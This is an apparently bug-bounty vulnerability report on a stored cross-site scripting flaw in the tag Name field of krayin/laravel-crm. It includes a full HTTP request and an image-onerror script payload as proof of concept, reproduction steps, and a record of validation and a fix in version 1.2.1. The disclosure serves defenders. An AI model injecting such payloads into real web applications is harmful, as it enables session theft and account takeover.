Cross-site Scripting (XSS) - Stored in krayin/laravel-crm

Valid

Reported on

Nov 29th 2021


Description

Stored XSS at Name of Tag

Detail

When rendering grid for Tag, Name value is not filtered before rendering which can trigger XSS

Proof of Concept

// PoC.req
POST /admin/settings/tags/edit/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/admin/settings/tags/edit/1
Cookie: _ga=GA1.1.758235244.1637376300; PHPSESSID=2aj34hm8nmvep57jeno66ecbtn; XSRF-TOKEN=eyJpdiI6InFQWXVobjlWektDY2hZckcxZW9OMWc9PSIsInZhbHVlIjoiVDJ3blh5aGZOZlRaRGJqTUdCOGNnQm83RWN4K3RadWFQblpvMnloS1VVRkFxdGEreG9vUGlWbFdpVFVvTUM3a3NOM3ZiRTI0aCs5b0oxaGFzVVVOQ08vc1I4aHBaZHE1NUJtSVFVRStPR0ZPMUxncll6Um1hL21UVm5hd01KYysiLCJtYWMiOiIxYWM3NDc3Y2FhOWMzNjk3M2UxYTgxODYyMzgzMTJmZjc3MjEzYTI5NGE4ODI2NTIxNmE3ZWFlMDc3NjU5MTAxIn0%3D; krayin_crm_session=eyJpdiI6IjZXWG1PK1N3WVloY20ydjFTS0hROVE9PSIsInZhbHVlIjoiNHJLbzZrd2UwYm90QWE0SFhXcWMydmR2aDNHRUxLUGNMZjJYZGhDZE14QUdvUXk2dloxQjZocGltMUxQd0piSmRmM00rL2Q5cGV1bjdNeTV2cThZZFhmRkhzcmtpY25Zbm5KUWxkZkEvS2t5dUMyMFdRREdQUXdacEF2Y2VFQVMiLCJtYWMiOiJkNWY5NTRiMmZiOWE2ZTNiMjdkNjZiNzI2ZWI2MDg0NGU4ZGI4YTM3ZmNkM2Q5NzhiZTVjMzg0YmYwZTRiOWQ1In0%3D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache

_token=nTihBpMW1L7emIz9py20nTTtNR7XV9H4At5rpuqc&_method=PUT&name=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert%281%29%3B%22%3E

Step to Reproduce

Goto Settings choose to Tags

Choose to Create tags , at Name input with payload : "><iMg SrC="x" oNeRRor="alert(1);">

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the krayin/laravel-crm team within 24 hours. a year ago
lethanhphuc submitted a
a year ago
Devansh validated this vulnerability a year ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Devansh marked this as fixed in 1.2.1 with commit 093e62 a year ago
lethanhphuc has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation